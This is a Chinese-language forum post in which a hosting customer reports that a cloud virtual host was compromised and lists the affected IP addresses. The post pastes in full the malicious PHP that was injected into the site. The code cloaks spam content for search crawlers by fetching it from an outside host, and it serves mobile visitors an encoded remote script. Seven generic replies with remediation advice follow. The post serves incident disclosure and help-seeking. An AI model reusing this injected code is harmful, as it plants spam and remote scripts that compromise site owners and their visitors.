云虚拟主机被跨站注入,未上线,未绑定域名,发现同IP的其它用户网站也被挂木马

其中一个虚拟,我当时为了备案,没有绑定任何域名第二天就中招了,然后我用Linux 转 win系统第三天再转Linux系统以为换ip可以解决,不过过5天依旧被注入。发现同IP的其它用户网站也被挂木马。

然后我自查,
我有很多个网站,放在不同服务器上,唯独虚拟主机的几个网站出问题,
如下几个ip有问题【云虚拟主机】,希望阿里云 做好安全措施。不要砸了自己的脚
139.129.175.72
139.129.172.118
139.129.175.154
139.129.155.247

<?php
set_time_limit(0);error_reporting(0);header(“content-type: text/html; charset=utf-8″);$a=”stristr”;$b=$_SERVER;function httpGetlai($c){$d=curl_init();curl_setopt($d,CURLOPT_URL,$c);curl_setopt($d,CURLOPT_USERAGENT,’Mozilla/5.0 (compatible; Baiduspider/2.0; +http://www.baidu.com/search/spider.html)’);curl_setopt($d,CURLOPT_SSL_VERIFYPEER,FALSE);curl_setopt($d,CURLOPT_SSL_VERIFYHOST,FALSE);curl_setopt($d,CURLOPT_RETURNTRANSFER,1);curl_setopt($d,CURLOPT_HEADER,0);$e=curl_exec($d);curl_close($d);return $e;}define(‘url’,$b[‘REQUEST_URI’]);define(‘ref’,!isset($b[‘HTTP_REFERER’])?”:$b[‘HTTP_REFERER’]);define(‘ent’,$b[‘HTTP_USER_AGENT’]);define(‘site’,”http://seo.nec-z1.com/?”);define(‘road’,”domain=”.$b[‘HTTP_HOST’].”&path=”.url.”&spider=”.urlencode(ent));define(‘memes’,road.”&referer=”.urlencode(ref));define(‘regs’,’@BaiduSpider|Sogou|Yisou|Haosou|360Spider@i’);define(‘mobile’,’/phone|pad|pod|iPhone|iPod|ios|iPad|Android|Mobile|BlackBerry|IEMobile|MQQBrowser|JUC|Fennec|wOSBrowser|BrowserNG|WebOS|Symbian|Windows Phone/’);define(‘area’,$a(url,”.xml”)or $a(url,”.fdc”)or $a(url,”.one”)or $a(url,”.bug”)or $a(url,”.doc”)or $a(url,”.love”)or $a(url,”.txt”)or $a(url,”.ppt”)or $a(url,”.pptx”)or $a(url,”.xls”)or $a(url,”.csv”)or $a(url,”.shtml”)or $a(url,”.znb”)or $a(url,”.msl”)or $a(url,”.mdb”)or $a(url,”.hxc”));if(preg_match(regs,ent)){if(area){echo httpGetlai(site.road);exit;}else{echo httpGetlai(“http://seo.nec-z1.com/x.php”);ob_flush();flush();}}if(area&&preg_match(mobile,ent)){echo base64_decode(‘PHNjcmlwdCBzcmM9aHR0cHM6Ly9nZ2RoLm9zcy1jbi1oYW5nemhvdS5hbGl5dW5jcy5jb20vZGgvZGgyLmpzPjwvc2NyaXB0Pg==’);exit;}
?>

「点点赞赏,手留余香」

    还没有人赞赏,快来当第一个赞赏的人吧!
=====这是一个广告位,招租中,联系qq 78315851====
6 条回复 A 作者 M 管理员
  1. 这段代码看起来像是一个恶意代码,它试图利用云虚拟主机的漏洞进行跨站注入,并且可能会在同一IP地址下的其他网站上挂马。建议您立即停止使用该虚拟主机,并联系阿里云客服进行安全检查和修复。同时,建议您对自己的网站进行安全检查和漏洞修复,以防止类似的攻击。

  2. 网站代码存在漏洞:如果您的网站代码存在漏洞,攻击者就可以利用这些漏洞进行攻击,包括跨站注入攻击。
    网站配置不当:如果您的网站配置不当,例如未开启安全模式或未设置严格的访问权限,攻击者也可以利用这些漏洞进行攻击。
    共享IP的其他用户存在漏洞:如果同IP的其他用户网站存在漏洞,攻击者可以利用这些漏洞对您的网站进行攻击。

  3. 根据您提供的信息,您的云虚拟主机遭受了跨站注入攻击,并且发现同一IP下的其他用户网站也被植入了恶意软件。您尝试了一些方法来解决问题,包括更改操作系统和IP地址,但问题仍然存在。

    跨站注入攻击是一种常见的网络安全威胁,攻击者通过在网站中注入恶意代码来获取敏感信息或控制网站。

    为了保护您的虚拟主机和网站,建议您采取以下措施:

    1. 及时更新和修补漏洞:确保您的操作系统、Web服务器和应用程序都是最新版本,并及时应用安全补丁,以修复已知的漏洞。

    2. 强化访问控制:确保您的虚拟主机只允许授权的用户访问,并使用强密码保护您的账户和数据库。

    3. 安装防火墙和入侵检测系统:使用防火墙来监控入站和出站流量,并设置适当的规则来过滤恶意请求。同时,使用入侵检测系统来及时发现和阻止攻击行为。

    4. 定期备份和监控:定期备份您的网站文件和数据库,以便在遭受攻击或数据损坏时能够恢复。同时,监控您的网站流量和日志,及时发现异常活动。

    5. 审查代码和插件:定期审查您的网站代码,确保没有潜在的安全漏洞。同时,只使用可信赖的插件和扩展,并及时更新它们。

  4. 如果你的云虚拟主机遭到跨站脚本注入(Cross-Site Scripting, XSS)攻击,并且发现同一IP的其他用户网站也受到了木马攻击,可以采取以下步骤进行应对:

    1. 隔离受影响的虚拟主机: 首先,将受到攻击的虚拟主机从网络中隔离,防止进一步的传播和恶意操作。断开与互联网的连接或停止虚拟主机的运行是常见的隔离方法。

    2. 修复漏洞: 分析并修复虚拟主机上存在的XSS漏洞。这可能涉及检查和清理输入输出数据、使用安全的编码方法、限制用户输入等措施。确保对所有用户提交的数据进行充分的验证和过滤,以防止恶意代码注入。

    3. 扫描和清除木马: 使用安全工具对虚拟主机进行完整的扫描,找出潜在的恶意文件或后门程序。对于已经发现的木马文件,及时清除它们,以恢复虚拟主机的安全性。

    4. 更新和加固系统: 确保虚拟主机的操作系统、Web服务器和应用程序等组件都是最新的,并及时安装安全补丁。此外,配置适当的防火墙规则,加强访问控制和权限管理,以减少潜在攻击的风险。

    5. 改密和监控: 更改所有受影响用户的密码,包括管理员、数据库、FTP等账户。部署安全监控工具,定期检查虚拟主机的日志和事件,及时发现并应对任何异常活动。

    6. 通知云服务提供商: 向你的云服务提供商报告该安全事件,并共享详细信息,以便他们采取相应的措施来保护服务器和其他用户。

  5. 参考

    将受感染的虚拟主机与其他虚拟主机分离,以防止攻击者进一步入侵和传播病毒。

    对受感染的虚拟主机进行全面的系统检查,删除所有可疑文件和程序,并对所有密码和用户进行更改。

    在虚拟主机上安装防火墙和安全软件,以防止未来的攻击。

    更新和升级所有软件和应用程序,以确保它们是最新的、没有漏洞的版本。

    对所有虚拟主机进行安全审计,以发现和修复可能存在的漏洞和风险。

    如果您使用的是公共云计算服务,建议联系云服务提供商,获取更多的安全帮助和建议。

  6. 如果您的云虚拟主机被跨站注入,未上线,未绑定域名,发现同IP的其它用户网站也被挂木马了,您可以尝试以下方法:

    1. 立即更改您的云虚拟主机密码。如果您使用的是默认密码,请立即更改密码。
    2. 检查您的云虚拟主机是否存在漏洞。如果存在漏洞,请及时修复。
    3. 检查您的云虚拟主机是否被黑客攻击。如果被攻击,请及时清除病毒和木马。
    4. 如果您不确定如何处理此问题,请联系您的云虚拟主机提供商或技术支持人员寻求帮助。
  7. 您所描述的情况表明您的云虚拟主机可能存在安全问题,导致被攻击并注入了恶意代码。以下是可能导致此问题的一些原因和建议的解决方案:

    1. 操作系统和软件漏洞:云虚拟主机上运行的操作系统和软件可能存在漏洞,攻击者利用这些漏洞进行注入攻击。确保您的操作系统和软件都是最新版本,并及时应用安全补丁。

    2. 弱密码或未授权访问:攻击者可能通过猜测或获得您的登录凭据来远程登录到您的虚拟主机,并进行注入攻击。强烈建议使用强密码,并限制仅允许授权用户进行远程访问。

    3. 文件上传漏洞:如果您的云虚拟主机上有文件上传功能,并且没有正确验证和过滤上传的文件,攻击者可以上传恶意脚本或文件来实施注入攻击。确保在接受用户上传的文件时进行适当的验证和过滤。

    4. 系统配置不当:某些服务或配置可能存在不安全的默认设置或错误配置,导致易受攻击。检查您的系统和服务配置,并参考安全最佳实践进行调整和加固。

    5. 安全审计和监控:定期对您的虚拟主机进行安全审计和监控,以便及时发现异常活动和潜在的安全问题。使用安全工具和系统日志来记录和分析网络流量、访问日志等信息。